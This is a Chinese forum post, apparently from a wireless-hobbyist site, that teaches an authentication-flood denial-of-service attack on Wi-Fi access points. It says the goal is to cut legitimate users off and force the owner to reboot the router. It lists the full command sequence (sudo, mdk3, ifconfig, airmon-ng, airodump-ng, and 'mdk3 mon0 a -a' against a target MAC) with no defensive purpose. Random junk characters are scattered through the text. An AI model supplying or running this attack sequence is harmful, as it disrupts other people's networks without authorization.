本帖最后由 191966260 于 2015-2-2 22:49 编辑 $ ], K2 D, X- a7 S4 [
" q `3 z: A5 g# Y/ C! t$ E
身份验证攻击效果说明:
% i1 W1 i }2 j9 U此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。 4 Q, @" s$ ]5 e, T# ^7 Q* {; G
下面是我整理的整个攻击的步骤及命令,有不明白兄弟可以留言探讨! (很多兄弟都会发现自己的linux系统中找不到mdk3,然后满世界去找mdk3,却发现无处下载。哈哈,其实你们的Linux中都是有mdk3的,只是菜单里找不到而已,我们用终端命令就可以打开它了!BELIEVE ME!) 打开终端并获取root权限(鼠标右键单击或者菜单里都可以找到终端):
, ]) I. V( [, p2 K% tsudo su 或 sudo -i! \3 L2 T/ M. C& u. _
打开mdk3:
+ Q v0 j2 f; {4 \* k: F% @% `. Lsudo mdk3 首先检测网卡:
?) ^6 ?% A3 _1 Gifconfig -a 然后模拟端口(一般默认wlan0):* }4 C3 L; Q* u$ z5 @
airmon-ng start wlan0 接着扫描AP(ctrl+c暂停):$ m( x; K8 V* J3 T2 y: ~+ d
airodump-ng mon0 最后用mdk3做身份验证攻击(举例:mdk3 mon0 a -a 00:00:00:00:00)9 }; Z0 X- {# l
mdk3 mon0 a -a mac( m0 J# D7 p6 B
K. d$ ^0 _2 e3 f4 G
! A0 a" \7 b3 A0 a
8 C$ R# N- ~" Y' Y( z
爱生活,爱anywlan,我是阿龙!+ J* g0 ^2 h: c
|